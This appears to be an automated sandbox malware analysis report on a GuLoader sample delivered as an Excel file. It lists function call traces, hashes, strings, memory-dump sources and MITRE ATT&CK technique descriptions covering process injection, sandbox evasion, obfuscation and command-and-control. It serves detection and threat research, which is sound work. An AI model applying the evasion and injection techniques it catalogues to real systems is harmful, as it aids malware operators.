Opcode ID: 272e97a669d3b6470e36b210c5f872993beb2fa133650b2bcf27f94f1a4ddef5
Instruction ID: 732c134532d96fb29955e73fcd573646f8ebc6089a05545e247013d8d4537ed8
Opcode Fuzzy Hash: 272e97a669d3b6470e36b210c5f872993beb2fa133650b2bcf27f94f1a4ddef5
Instruction Fuzzy Hash: BFB092BA6015808FFF42CB0CC481B0073F0FB48648B0804E0E402CB712D224E900CA00

Uniqueness

Uniqueness Score: -1.00%

Function 02357759, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0040E710, Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

#670.MSVBVM60(?), ref: 0040E751
__vbaVarTstEq.MSVBVM60(?,?), ref: 0040E76D
__vbaFreeVar.MSVBVM60 ref: 0040E779
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000003,00000000), ref: 0040E79A
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E7C2
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E7CC
__vbaUI1I2.MSVBVM60 ref: 0040E7DB
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E804
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E808
__vbaUI1I2.MSVBVM60 ref: 0040E811
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E83A
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E83E
__vbaUI1I2.MSVBVM60 ref: 0040E847
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E870
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E874
__vbaUI1I2.MSVBVM60 ref: 0040E87D
#541.MSVBVM60(?,17:17:17), ref: 0040E891
__vbaStrVarMove.MSVBVM60(?), ref: 0040E89B
__vbaStrMove.MSVBVM60 ref: 0040E8AC
__vbaFreeVar.MSVBVM60 ref: 0040E8B7
__vbaVarDup.MSVBVM60 ref: 0040E8CD
#667.MSVBVM60(?), ref: 0040E8D7
__vbaStrMove.MSVBVM60 ref: 0040E8E2
__vbaFreeVar.MSVBVM60 ref: 0040E8E7
__vbaFreeStr.MSVBVM60(0040E921), ref: 0040E90D
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0040E915
__vbaFreeStr.MSVBVM60 ref: 0040E91E

Strings

17:17:17, xrefs: 0040E888
Puffball9, xrefs: 0040E75F
bladformet, xrefs: 0040E8BF

Memory Dump Source

Source File: 00000006.00000002.618539941.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.618535617.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.618554057.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.618558555.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$BoundsErrorGenerate$Free$Move$#541#667#670DestructRedim
String ID: 17:17:17$Puffball9$bladformet
API String ID: 2539617868-3137105727
Opcode ID: 9b5c7b169b6baa930b0269b5458bebd5deac0fe6e48f363f7c0a6a58f506512e
Instruction ID: 9fc2661bb15c1ca5f70677376823ad77b20eb2cc05ba887ecbae1d8c7706ab0c
Opcode Fuzzy Hash: 9b5c7b169b6baa930b0269b5458bebd5deac0fe6e48f363f7c0a6a58f506512e
Instruction Fuzzy Hash: 8D51A375D002098FCB14DFA9D984AEEBBB5FF88300F10856AD941B73A0CB74D985CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4E0, Relevance: 30.2, APIs: 20, Instructions: 174COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0040E523
#713.MSVBVM60(0040D2CC), ref: 0040E52E
__vbaStrMove.MSVBVM60 ref: 0040E539
__vbaStrCmp.MSVBVM60(0040D2D8,00000000), ref: 0040E545
__vbaFreeStr.MSVBVM60 ref: 0040E558
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040E579
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040E5A4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,00000058), ref: 0040E5CC
__vbaStrMove.MSVBVM60 ref: 0040E5D7
__vbaFreeObj.MSVBVM60 ref: 0040E5E6
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040E5FB
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040E620
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,00000078), ref: 0040E640
__vbaFreeObj.MSVBVM60 ref: 0040E645
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040E65A
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,0000004C), ref: 0040E67F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D204,0000002C), ref: 0040E6B8
__vbaFreeObj.MSVBVM60 ref: 0040E6C1
__vbaFreeStr.MSVBVM60(0040E6F2), ref: 0040E6EA
__vbaFreeStr.MSVBVM60 ref: 0040E6EF

Memory Dump Source

Source File: 00000006.00000002.618539941.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.618535617.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.618554057.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.618558555.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$Move$#713Copy
String ID:
API String ID: 638766980-0
Opcode ID: 5981a5a3e9d8d32e65e3cbd116cdb93cfa9ce13421126c845e8f4e149f01632f
Instruction ID: 4c53479c964c98bfa5f50ec579fde2b8d1181989f6354ad00315d5c11b99f183
Opcode Fuzzy Hash: 5981a5a3e9d8d32e65e3cbd116cdb93cfa9ce13421126c845e8f4e149f01632f
Instruction Fuzzy Hash: 24518F70900219AFCB14DFA5DD89EDEBBB8FF18704F10442AF545B72A0D678AD45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9B0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0040E9F0
#538.MSVBVM60(?,000007DB,0000000B,0000000B), ref: 0040EA03
#557.MSVBVM60(?), ref: 0040EA0D
__vbaFreeVar.MSVBVM60 ref: 0040EA24
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040EA45
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040EA70
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,000000C8), ref: 0040EA9E
__vbaFreeObj.MSVBVM60 ref: 0040EAA3
#594.MSVBVM60(?), ref: 0040EABB
__vbaFreeVar.MSVBVM60 ref: 0040EAC4
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040EADC
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,0000001C), ref: 0040EB01
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D158,00000060), ref: 0040EB42
__vbaFreeObj.MSVBVM60 ref: 0040EB4B
__vbaFreeStr.MSVBVM60(0040EB84), ref: 0040EB7D

Strings

Transhumanize9, xrefs: 0040EB25

Memory Dump Source

Source File: 00000006.00000002.618539941.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.618535617.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.618554057.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.618558555.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$#538#557#594Copy
String ID: Transhumanize9
API String ID: 1587751170-3449327895
Opcode ID: 6356f7db3f71f50eab768bb12a117f350bd841547e0cd32641fc4d047cb92766
Instruction ID: c87126d42b47fcb8516f2113e3387c1c23bc2b922d9fa8ea0ada3093953560d9
Opcode Fuzzy Hash: 6356f7db3f71f50eab768bb12a117f350bd841547e0cd32641fc4d047cb92766
Instruction Fuzzy Hash: A5517D71A01209AFCB14DF95DD89F9EBBB4FF08704F20452AF505B72A0D778A945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBB0, Relevance: 25.7, APIs: 17, Instructions: 180COMMON

Download Yara Rule

APIs

#679.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,?,?), ref: 0040EC1D
__vbaFpR8.MSVBVM60 ref: 0040EC23
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040EC4E
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040EC72
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040EC9D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,000000D8), ref: 0040ECCB
__vbaStrMove.MSVBVM60 ref: 0040ECD6
__vbaFreeObj.MSVBVM60 ref: 0040ECDF
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040ECF7
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040ED1C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,00000140), ref: 0040ED42
__vbaFreeObj.MSVBVM60 ref: 0040ED47
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040ED5F
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000034,?,?,0000484D,?), ref: 0040EDA9
__vbaObjSet.MSVBVM60(?,?,?,?,0000484D,?), ref: 0040EDBA
__vbaFreeObj.MSVBVM60(0040EE08), ref: 0040EDF8
__vbaFreeStr.MSVBVM60 ref: 0040EE01

Memory Dump Source

Source File: 00000006.00000002.618539941.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.618535617.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.618554057.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.618558555.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$#679ListMove
String ID:
API String ID: 1222570374-0
Opcode ID: 749e9f480fe4db9d2f17065fb9ad0c5b0913616097700c070ce6310e7ac582b1
Instruction ID: ec0a40dab353d342079328e3c9f730e25b8375b058e2fa7c4a05bbd156487ebc
Opcode Fuzzy Hash: 749e9f480fe4db9d2f17065fb9ad0c5b0913616097700c070ce6310e7ac582b1
Instruction Fuzzy Hash: A6615D71900209AFDB14DF95DD89ADEBBB8FF08304F14443AF609B72A0D7789985CB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 1412 Parent PID: 2664 vbc.exeCOMMON

Executed Functions

Function 001B5B9A, Relevance: 1.7, APIs: 1, Instructions: 165memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 001B5D34

Memory Dump Source

Source File: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: aa8a256003c7edf98af3e55f20faec6a06f61bfbb61d48f0fadc8fd1d8ddc3c8
Instruction ID: 9c9853d34a9a47b6c8b22b1a67499dfc5ff50bee2b8e5e523e9f8deb25abedf9
Opcode Fuzzy Hash: aa8a256003c7edf98af3e55f20faec6a06f61bfbb61d48f0fadc8fd1d8ddc3c8
Instruction Fuzzy Hash: FD519971608258CFDB74AF69D8993EE77A2EF68340F54402EED8DDB250D7308A81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001B5C7F, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29d3e8ec41688802e0978eaad87ecc0b8af816da25a8aff658c76241f8fad6bb
Instruction ID: 698bcc4ca87706c6cdf0dd7bbd0bc1c7926473a6ad1ba2be046cfeacf1a7f459
Opcode Fuzzy Hash: 29d3e8ec41688802e0978eaad87ecc0b8af816da25a8aff658c76241f8fad6bb
Instruction Fuzzy Hash: 3E31F23900AB848BDB259F32C9C57DABF97AF26324F54054CC98D87A22D370DA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001B5CEC, Relevance: 1.6, APIs: 1, Instructions: 53memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 001B5D34

Memory Dump Source

Source File: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 9b5562e65366753a83ad2377c30306efb49159ae39ca6dbe0b47a0076f0d1e8a
Instruction ID: fd0c635bd041831ec76303f978e79935210d86c40d59a8a33d33757d65ef2387
Opcode Fuzzy Hash: 9b5562e65366753a83ad2377c30306efb49159ae39ca6dbe0b47a0076f0d1e8a
Instruction Fuzzy Hash: B0119E31604388CFDB35AF69C8E47DDBBA2EF59344F51002DEC898B211D3309A85CB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ORDER RFQ1009202.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back